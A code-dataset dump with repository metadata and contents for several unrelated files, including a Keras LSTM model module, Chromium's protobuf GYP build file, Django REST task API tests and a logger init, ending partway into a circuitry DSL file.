hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d9a00b2c6f1a0e88ad5b4a7def2a45bd074f417f
| 3,880 |
py
|
Python
|
pypagai/models/model_lstm.py
|
gcouti/pypagAI
|
d08fac95361dcc036d890a88cb86ce090322a612
|
[
"Apache-2.0"
] | 1 |
2018-07-24T18:53:26.000Z
|
2018-07-24T18:53:26.000Z
|
pypagai/models/model_lstm.py
|
gcouti/pypagAI
|
d08fac95361dcc036d890a88cb86ce090322a612
|
[
"Apache-2.0"
] | 7 |
2020-01-28T21:45:14.000Z
|
2022-03-11T23:20:53.000Z
|
pypagai/models/model_lstm.py
|
gcouti/pypagAI
|
d08fac95361dcc036d890a88cb86ce090322a612
|
[
"Apache-2.0"
] | null | null | null |
from keras import Model, Input
from keras.layers import Dense, concatenate, LSTM, Reshape, Permute, Embedding, Dropout, Convolution1D, Flatten
from keras.optimizers import Adam
from pypagai.models.base import KerasModel
class SimpleLSTM(KerasModel):
"""
Use a simple lstm neural network
"""
@staticmethod
def default_config():
config = KerasModel.default_config()
config['hidden'] = 32
return config
def __init__(self, cfg):
super().__init__(cfg)
self._cfg_ = cfg
def _create_network_(self):
hidden = self._cfg_['hidden']
story = Input((self._story_maxlen, ), name='story')
question = Input((self._query_maxlen, ), name='question')
conc = concatenate([story, question],)
conc = Reshape((1, int(conc.shape[1])))(conc)
conc = Permute((2, 1))(conc)
response = LSTM(hidden, dropout=0.2, recurrent_dropout=0.2)(conc)
response = Dense(self._vocab_size, activation='softmax')(response)
self._model = Model(inputs=[story, question], outputs=response)
self._model.compile(optimizer=Adam(lr=2e-4), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
class EmbedLSTM(KerasModel):
"""
Use a simple lstm neural network
"""
@staticmethod
def default_config():
config = KerasModel.default_config()
config['hidden'] = 32
return config
def __init__(self, cfg):
super().__init__(cfg)
self._cfg_ = cfg
def _create_network_(self):
hidden = self._cfg_['hidden']
story = Input((self._story_maxlen, ), name='story')
question = Input((self._query_maxlen, ), name='question')
eb_story = Embedding(self._vocab_size, 64)(story)
eb_story = Dropout(0.3)(eb_story)
eb_question = Embedding(self._vocab_size, 64)(question)
eb_question = Dropout(0.3)(eb_question)
conc = concatenate([eb_story, eb_question], axis=1)
response = LSTM(hidden, dropout=0.2, recurrent_dropout=0.2)(conc)
response = Dense(self._vocab_size, activation='softmax')(response)
self._model = Model(inputs=[story, question], outputs=response)
self._model.compile(optimizer=Adam(lr=2e-4), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
class ConvLSTM(KerasModel):
"""
Use a simple lstm neural network
"""
@staticmethod
def default_config():
config = KerasModel.default_config()
config['hidden'] = 32
return config
def __init__(self, model_cfg):
super().__init__(model_cfg)
self._cfg = model_cfg
def _create_network_(self):
hidden = self._cfg['hidden']
story = Input((self._story_maxlen, ), name='story')
question = Input((self._query_maxlen, ), name='question')
eb_story = Embedding(self._vocab_size, 64)(story)
eb_story = Convolution1D(64, 3, padding='same')(eb_story)
eb_story = Convolution1D(32, 3, padding='same')(eb_story)
eb_story = Convolution1D(16, 3, padding='same')(eb_story)
# eb_story = Flatten()(eb_story)
eb_question = Embedding(self._vocab_size, 64)(question)
eb_question = Convolution1D(64, 3, padding='same')(eb_question)
eb_question = Convolution1D(32, 3, padding='same')(eb_question)
eb_question = Convolution1D(16, 3, padding='same')(eb_question)
# eb_question = Flatten()(eb_question)
conc = concatenate([eb_story, eb_question], axis=1)
response = LSTM(hidden, dropout=0.2, recurrent_dropout=0.2)(conc)
response = Dense(self._vocab_size, activation='softmax')(response)
self._model = Model(inputs=[story, question], outputs=response)
self._model.compile(optimizer=Adam(lr=2e-4), loss='sparse_categorical_crossentropy', metrics=['accuracy'])
| 33.162393 | 114 | 0.650773 | 460 | 3,880 | 5.226087 | 0.171739 | 0.040765 | 0.037854 | 0.034942 | 0.851498 | 0.851498 | 0.835691 | 0.811564 | 0.741681 | 0.741681 | 0 | 0.022069 | 0.217526 | 3,880 | 116 | 115 | 33.448276 | 0.769763 | 0.043041 | 0 | 0.694444 | 0 | 0 | 0.064648 | 0.025368 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.055556 | 0 | 0.263889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
d9fe73cee8f0ad5d98f81eb365b256cba7970cbe
| 13,093 |
gyp
|
Python
|
third_party/protobuf/protobuf.gyp
|
meego-tablet-ux/meego-app-browser
|
0f4ef17bd4b399c9c990a2f6ca939099495c2b9c
|
[
"BSD-3-Clause"
] | 1 |
2015-10-12T09:14:22.000Z
|
2015-10-12T09:14:22.000Z
|
third_party/protobuf/protobuf.gyp
|
meego-tablet-ux/meego-app-browser
|
0f4ef17bd4b399c9c990a2f6ca939099495c2b9c
|
[
"BSD-3-Clause"
] | null | null | null |
third_party/protobuf/protobuf.gyp
|
meego-tablet-ux/meego-app-browser
|
0f4ef17bd4b399c9c990a2f6ca939099495c2b9c
|
[
"BSD-3-Clause"
] | 1 |
2020-11-04T07:22:28.000Z
|
2020-11-04T07:22:28.000Z
|
# Copyright (c) 2009 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'conditions': [
['OS!="win"', {
'variables': {
'config_h_dir':
'.', # crafted for gcc/linux.
},
}, { # else, OS=="win"
'variables': {
'config_h_dir':
'vsprojects', # crafted for msvc.
},
'target_defaults': {
'msvs_disabled_warnings': [
4018, # signed/unsigned mismatch in comparison
4244, # implicit conversion, possible loss of data
4355, # 'this' used in base member initializer list
],
'defines!': [
'WIN32_LEAN_AND_MEAN', # Protobuf defines this itself.
],
},
}]
],
'targets': [
# The "lite" lib is about 1/7th the size of the heavy lib,
# but it doesn't support some of the more exotic features of
# protobufs, like reflection. To generate C++ code that can link
# against the lite version of the library, add the option line:
#
# option optimize_for = LITE_RUNTIME;
#
# to your .proto file.
{
'target_name': 'protobuf_lite',
'type': '<(library)',
'toolsets': ['host', 'target'],
'sources': [
'src/google/protobuf/stubs/common.h',
'src/google/protobuf/stubs/once.h',
'src/google/protobuf/extension_set.h',
'src/google/protobuf/generated_message_util.h',
'src/google/protobuf/message_lite.h',
'src/google/protobuf/repeated_field.h',
'src/google/protobuf/unknown_field_set.cc',
'src/google/protobuf/unknown_field_set.h',
'src/google/protobuf/wire_format_lite.h',
'src/google/protobuf/wire_format_lite_inl.h',
'src/google/protobuf/io/coded_stream.h',
'src/google/protobuf/io/zero_copy_stream.h',
'src/google/protobuf/io/zero_copy_stream_impl_lite.h',
'src/google/protobuf/stubs/common.cc',
'src/google/protobuf/stubs/once.cc',
'src/google/protobuf/stubs/hash.h',
'src/google/protobuf/stubs/map-util.h',
'src/google/protobuf/stubs/stl_util-inl.h',
'src/google/protobuf/extension_set.cc',
'src/google/protobuf/generated_message_util.cc',
'src/google/protobuf/message_lite.cc',
'src/google/protobuf/repeated_field.cc',
'src/google/protobuf/wire_format_lite.cc',
'src/google/protobuf/io/coded_stream.cc',
'src/google/protobuf/io/coded_stream_inl.h',
'src/google/protobuf/io/zero_copy_stream.cc',
'src/google/protobuf/io/zero_copy_stream_impl_lite.cc',
'<(config_h_dir)/config.h',
],
'include_dirs': [
'<(config_h_dir)',
'src',
],
# This macro must be defined to suppress the use of dynamic_cast<>,
# which requires RTTI.
'defines': [
'GOOGLE_PROTOBUF_NO_RTTI',
],
'direct_dependent_settings': {
'include_dirs': [
'<(config_h_dir)',
'src',
],
'defines': [
'GOOGLE_PROTOBUF_NO_RTTI',
],
},
},
# This is the full, heavy protobuf lib that's needed for c++ .proto's
# that don't specify the LITE_RUNTIME option. The protocol
# compiler itself (protoc) falls into that category.
#
# DO NOT LINK AGAINST THIS TARGET IN CHROME CODE --agl
{
'target_name': 'protobuf_full_do_not_use',
'type': '<(library)',
'toolsets': ['host','target'],
'sources': [
'src/google/protobuf/descriptor.h',
'src/google/protobuf/descriptor.pb.h',
'src/google/protobuf/descriptor_database.h',
'src/google/protobuf/dynamic_message.h',
'src/google/protobuf/generated_message_reflection.h',
'src/google/protobuf/message.h',
'src/google/protobuf/reflection_ops.h',
'src/google/protobuf/service.h',
'src/google/protobuf/text_format.h',
'src/google/protobuf/unknown_field_set.h',
'src/google/protobuf/wire_format.h',
'src/google/protobuf/io/gzip_stream.h',
'src/google/protobuf/io/printer.h',
'src/google/protobuf/io/tokenizer.h',
'src/google/protobuf/io/zero_copy_stream_impl.h',
'src/google/protobuf/compiler/code_generator.h',
'src/google/protobuf/compiler/command_line_interface.h',
'src/google/protobuf/compiler/importer.h',
'src/google/protobuf/compiler/parser.h',
'src/google/protobuf/stubs/strutil.cc',
'src/google/protobuf/stubs/strutil.h',
'src/google/protobuf/stubs/substitute.cc',
'src/google/protobuf/stubs/substitute.h',
'src/google/protobuf/stubs/structurally_valid.cc',
'src/google/protobuf/descriptor.cc',
'src/google/protobuf/descriptor.pb.cc',
'src/google/protobuf/descriptor_database.cc',
'src/google/protobuf/dynamic_message.cc',
'src/google/protobuf/extension_set_heavy.cc',
'src/google/protobuf/generated_message_reflection.cc',
'src/google/protobuf/message.cc',
'src/google/protobuf/reflection_ops.cc',
'src/google/protobuf/service.cc',
'src/google/protobuf/text_format.cc',
'src/google/protobuf/unknown_field_set.cc',
'src/google/protobuf/wire_format.cc',
# This file pulls in zlib, but it's not actually used by protoc, so
# instead of compiling zlib for the host, let's just exclude this.
# 'src/src/google/protobuf/io/gzip_stream.cc',
'src/google/protobuf/io/printer.cc',
'src/google/protobuf/io/tokenizer.cc',
'src/google/protobuf/io/zero_copy_stream_impl.cc',
'src/google/protobuf/compiler/importer.cc',
'src/google/protobuf/compiler/parser.cc',
],
'dependencies': [
'protobuf_lite',
],
'export_dependent_settings': [
'protobuf_lite',
],
},
{
'target_name': 'protoc',
'type': 'executable',
'toolsets': ['host'],
'sources': [
'src/google/protobuf/compiler/code_generator.cc',
'src/google/protobuf/compiler/command_line_interface.cc',
'src/google/protobuf/compiler/plugin.cc',
'src/google/protobuf/compiler/plugin.pb.cc',
'src/google/protobuf/compiler/subprocess.cc',
'src/google/protobuf/compiler/subprocess.h',
'src/google/protobuf/compiler/zip_writer.cc',
'src/google/protobuf/compiler/zip_writer.h',
'src/google/protobuf/compiler/cpp/cpp_enum.cc',
'src/google/protobuf/compiler/cpp/cpp_enum.h',
'src/google/protobuf/compiler/cpp/cpp_enum_field.cc',
'src/google/protobuf/compiler/cpp/cpp_enum_field.h',
'src/google/protobuf/compiler/cpp/cpp_extension.cc',
'src/google/protobuf/compiler/cpp/cpp_extension.h',
'src/google/protobuf/compiler/cpp/cpp_field.cc',
'src/google/protobuf/compiler/cpp/cpp_field.h',
'src/google/protobuf/compiler/cpp/cpp_file.cc',
'src/google/protobuf/compiler/cpp/cpp_file.h',
'src/google/protobuf/compiler/cpp/cpp_generator.cc',
'src/google/protobuf/compiler/cpp/cpp_helpers.cc',
'src/google/protobuf/compiler/cpp/cpp_helpers.h',
'src/google/protobuf/compiler/cpp/cpp_message.cc',
'src/google/protobuf/compiler/cpp/cpp_message.h',
'src/google/protobuf/compiler/cpp/cpp_message_field.cc',
'src/google/protobuf/compiler/cpp/cpp_message_field.h',
'src/google/protobuf/compiler/cpp/cpp_primitive_field.cc',
'src/google/protobuf/compiler/cpp/cpp_primitive_field.h',
'src/google/protobuf/compiler/cpp/cpp_service.cc',
'src/google/protobuf/compiler/cpp/cpp_service.h',
'src/google/protobuf/compiler/cpp/cpp_string_field.cc',
'src/google/protobuf/compiler/cpp/cpp_string_field.h',
'src/google/protobuf/compiler/java/java_enum.cc',
'src/google/protobuf/compiler/java/java_enum.h',
'src/google/protobuf/compiler/java/java_enum_field.cc',
'src/google/protobuf/compiler/java/java_enum_field.h',
'src/google/protobuf/compiler/java/java_extension.cc',
'src/google/protobuf/compiler/java/java_extension.h',
'src/google/protobuf/compiler/java/java_field.cc',
'src/google/protobuf/compiler/java/java_field.h',
'src/google/protobuf/compiler/java/java_file.cc',
'src/google/protobuf/compiler/java/java_file.h',
'src/google/protobuf/compiler/java/java_generator.cc',
'src/google/protobuf/compiler/java/java_helpers.cc',
'src/google/protobuf/compiler/java/java_helpers.h',
'src/google/protobuf/compiler/java/java_message.cc',
'src/google/protobuf/compiler/java/java_message.h',
'src/google/protobuf/compiler/java/java_message_field.cc',
'src/google/protobuf/compiler/java/java_message_field.h',
'src/google/protobuf/compiler/java/java_primitive_field.cc',
'src/google/protobuf/compiler/java/java_primitive_field.h',
'src/google/protobuf/compiler/java/java_service.cc',
'src/google/protobuf/compiler/java/java_service.h',
'src/google/protobuf/compiler/java/java_string_field.cc',
'src/google/protobuf/compiler/java/java_string_field.h',
'src/google/protobuf/compiler/python/python_generator.cc',
'src/google/protobuf/compiler/main.cc',
],
'dependencies': [
'protobuf_full_do_not_use',
],
'include_dirs': [
'<(config_h_dir)',
'src/src',
],
},
{
# Generate the python module needed by all protoc-generated Python code.
'target_name': 'py_proto',
'type': 'none',
'copies': [
{
'destination': '<(PRODUCT_DIR)/pyproto/google/',
'files': [
# google/ module gets an empty __init__.py.
'__init__.py',
],
},
{
'destination': '<(PRODUCT_DIR)/pyproto/google/protobuf',
'files': [
'python/google/protobuf/__init__.py',
'python/google/protobuf/descriptor.py',
'python/google/protobuf/message.py',
'python/google/protobuf/reflection.py',
'python/google/protobuf/service.py',
'python/google/protobuf/service_reflection.py',
'python/google/protobuf/text_format.py',
# TODO(ncarter): protoc's python generator treats descriptor.proto
# specially, but it's not possible to trigger the special treatment
# unless you run protoc from ./src/src (the treatment is based
# on the path to the .proto file matching a constant exactly).
# I'm not sure how to convince gyp to execute a rule from a
# different directory. Until this is resolved, use a copy of
# descriptor_pb2.py that I manually generated.
'descriptor_pb2.py',
],
},
{
'destination': '<(PRODUCT_DIR)/pyproto/google/protobuf/internal',
'files': [
'python/google/protobuf/internal/__init__.py',
'python/google/protobuf/internal/api_implementation.py',
'python/google/protobuf/internal/containers.py',
'python/google/protobuf/internal/cpp_message.py',
'python/google/protobuf/internal/decoder.py',
'python/google/protobuf/internal/encoder.py',
'python/google/protobuf/internal/generator_test.py',
'python/google/protobuf/internal/message_listener.py',
'python/google/protobuf/internal/python_message.py',
'python/google/protobuf/internal/type_checkers.py',
'python/google/protobuf/internal/wire_format.py',
],
},
],
# # We can't generate a proper descriptor_pb2.py -- see earlier comment.
# 'rules': [
# {
# 'rule_name': 'genproto',
# 'extension': 'proto',
# 'inputs': [
# '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)protoc<(EXECUTABLE_SUFFIX)',
# ],
# 'variables': {
# # The protoc compiler requires a proto_path argument with the
# # directory containing the .proto file.
# 'rule_input_relpath': 'src/google/protobuf',
# },
# 'outputs': [
# '<(PRODUCT_DIR)/pyproto/google/protobuf/<(RULE_INPUT_ROOT)_pb2.py',
# ],
# 'action': [
# '<(PRODUCT_DIR)/<(EXECUTABLE_PREFIX)protoc<(EXECUTABLE_SUFFIX)',
# '-I./src',
# '-I.',
# '--python_out=<(PRODUCT_DIR)/pyproto/google/protobuf',
# 'google/protobuf/descriptor.proto',
# ],
# 'message': 'Generating Python code from <(RULE_INPUT_PATH)',
# },
# ],
# 'dependencies': [
# 'protoc#host',
# ],
# 'sources': [
# 'src/google/protobuf/descriptor.proto',
# ],
},
],
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
| 41.302839 | 81 | 0.621554 | 1,560 | 13,093 | 5.064103 | 0.186538 | 0.269367 | 0.273291 | 0.196203 | 0.700127 | 0.478734 | 0.360633 | 0.256582 | 0.064937 | 0.025949 | 0 | 0.002701 | 0.236462 | 13,093 | 316 | 82 | 41.433544 | 0.787536 | 0.21523 | 0 | 0.218107 | 0 | 0 | 0.677521 | 0.62348 | 0 | 0 | 0 | 0.003165 | 0 | 1 | 0 | true | 0 | 0.00823 | 0 | 0.00823 | 0.00823 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 |
0
| 6 |
8a04ff873e3cd041bc9cad7f7fc7707f7c185cce
| 6,652 |
py
|
Python
|
invera/api/tests.py
|
LeoLeiva/todo-challenge
|
f6f24f53758eb4e425c91516bcab7af8cad66814
|
[
"MIT"
] | null | null | null |
invera/api/tests.py
|
LeoLeiva/todo-challenge
|
f6f24f53758eb4e425c91516bcab7af8cad66814
|
[
"MIT"
] | null | null | null |
invera/api/tests.py
|
LeoLeiva/todo-challenge
|
f6f24f53758eb4e425c91516bcab7af8cad66814
|
[
"MIT"
] | 1 |
2021-01-10T20:19:42.000Z
|
2021-01-10T20:19:42.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import inspect
from task.models import InveraTask
from api.utils import send_test_csv_report
from django.contrib.auth.models import User
from rest_framework.test import APIClient, APITestCase
from rest_framework.reverse import reverse
from rest_framework import status
TEST_RESULTS = []
RECIPIENTS = ['email@destino.com']
class TaskListTestCase(APITestCase):
def setUp(self) -> None:
self.user = User.objects.create_user(
username='test_user', password='adminpass')
self.other_user = User.objects.create_user(
username='other_user', password='adminpass')
self.task = InveraTask.objects.create(
userTask=self.user, title='My Initial Task')
self.client = APIClient()
@classmethod
def tearDownClass(cls):
User.objects.filter(username__in=['test_user', 'other_user']).delete()
def test_create_task_with_un_authenticate_user(self):
"""
En este caso de prueba, estamos probando la API Task Create utilizando un usuario no autenticado.
"""
response = self.client.post(
reverse('api-task'), {'title': 'My Task 1'}, format='json')
is_passed = response.status_code == status.HTTP_403_FORBIDDEN
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "El usuario no autenticado no puede agregar una tarea a la lista"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: El usuario no autenticado no puede agregar una tarea a la lista")
print("-----------")
def test_put_task_with_un_authenticate_user(self):
"""
En este caso de prueba, estamos probando la API Task PUT utilizando un usuario no autenticado.
"""
response = self.client.put(
reverse('api-task'), {'title': 'My Task'}, format='json')
is_passed = response.status_code == status.HTTP_403_FORBIDDEN
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "El usuario no autenticado no puede modificar una tarea"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: El usuario no autenticado no puede modificar una tarea")
print("-----------")
def test_put_task_with_authenticated_user(self):
self.client.login(username='test_user', password='adminpass')
response = self.client.put(reverse('api-task-detail', args=[str(self.task.idTask)]), {'title': 'My Task 2'}, format='json')
is_passed = response.status_code == status.HTTP_200_OK
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "Usuario autenticado puede modificar una tarea suya"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: Usuario autenticado puede modificar una tarea suya")
print("-----------")
def test_get_other_user_task_detail(self):
"""
En este caso de prueba, estamos probando la API Task GET y tratando de obtener detalles de la tarea de un usuario que usa credenciales de usuario diferentes.
"""
self.client.login(username='other_user', password='adminpass')
response = self.client.get(reverse('api-task-detail', args=[str(self.task.idTask)]))
is_passed = response.status_code == status.HTTP_404_NOT_FOUND
# is_passed = response.status_code == status.HTTP_403_FORBIDDEN
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "Solo el propietario puede ver el detalle de la tarea"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: Solo el propietario puede ver el detalle de la tarea")
print("-----------")
def test_create_task_with_authenticated_user(self):
self.client.login(username='test_user', password='adminpass')
response = self.client.post(reverse('api-task'), {'title': 'My Task'}, format='json')
is_passed = response.status_code == status.HTTP_201_CREATED
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "Usuario autenticado agrega tarea a la lista"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: Usuario autenticado agrega tarea a la lista")
print("-----------")
def test_get_task_detail(self):
self.client.login(username='test_user', password='adminpass')
response = self.client.get(reverse('api-task-detail', args=[str(self.task.idTask)]))
is_passed = response.status_code == status.HTTP_200_OK
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "Usuario autenticado puede ver detalles de la tarea correctamente"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: Usuario autenticado puede ver detalles de la tarea correctamente")
print("-----------")
class CSVReportTest(APITestCase):
def test_send_csv(self):
send_test_csv_report(
test_results=TEST_RESULTS,
recipients=RECIPIENTS
)
| 37.370787 | 165 | 0.634245 | 783 | 6,652 | 5.203065 | 0.177522 | 0.03731 | 0.029455 | 0.070692 | 0.794551 | 0.77246 | 0.751841 | 0.728031 | 0.707904 | 0.672067 | 0 | 0.004797 | 0.247895 | 6,652 | 177 | 166 | 37.581921 | 0.809514 | 0.065394 | 0 | 0.556452 | 0 | 0 | 0.272831 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072581 | false | 0.193548 | 0.064516 | 0 | 0.153226 | 0.241935 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 6 |
8a45f1c6e8e51b93e9ab54060af5d33d536b2abf
| 75 |
py
|
Python
|
logger/__init__.py
|
remmyzen/nqs-tensorflow2
|
2af5d5ebb108eac4d2daa5082bdef11c8107bd1b
|
[
"MIT"
] | 4 |
2021-07-29T17:52:54.000Z
|
2022-02-15T06:32:15.000Z
|
logger/__init__.py
|
remmyzen/nqs-tensorflow2
|
2af5d5ebb108eac4d2daa5082bdef11c8107bd1b
|
[
"MIT"
] | null | null | null |
logger/__init__.py
|
remmyzen/nqs-tensorflow2
|
2af5d5ebb108eac4d2daa5082bdef11c8107bd1b
|
[
"MIT"
] | null | null | null |
from .logger import Logger
from .logger_supervised import LoggerSupervised
| 25 | 47 | 0.866667 | 9 | 75 | 7.111111 | 0.555556 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106667 | 75 | 2 | 48 | 37.5 | 0.955224 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 |
0
| 6 |
8a50b1905c10bef14015d0bd1e4794d8d3018140
| 38,121 |
py
|
Python
|
circuitry/circuitry.py
|
nthparty/circuitry
|
e8bc8bde93cf5056368a14a21086f18f1bcd934f
|
[
"MIT"
] | 3 |
2020-06-23T19:11:53.000Z
|
2021-01-06T16:42:56.000Z
|
circuitry/circuitry.py
|
nthparty/circuitry
|
e8bc8bde93cf5056368a14a21086f18f1bcd934f
|
[
"MIT"
] | 4 |
2020-07-28T03:14:59.000Z
|
2020-07-28T17:44:25.000Z
|
circuitry/circuitry.py
|
nthparty/circuitry
|
e8bc8bde93cf5056368a14a21086f18f1bcd934f
|
[
"MIT"
] | 1 |
2020-06-23T19:07:59.000Z
|
2020-06-23T19:07:59.000Z
|
"""Embedded DSL for assembling logic circuits.
Embedded domain-specific combinator library for
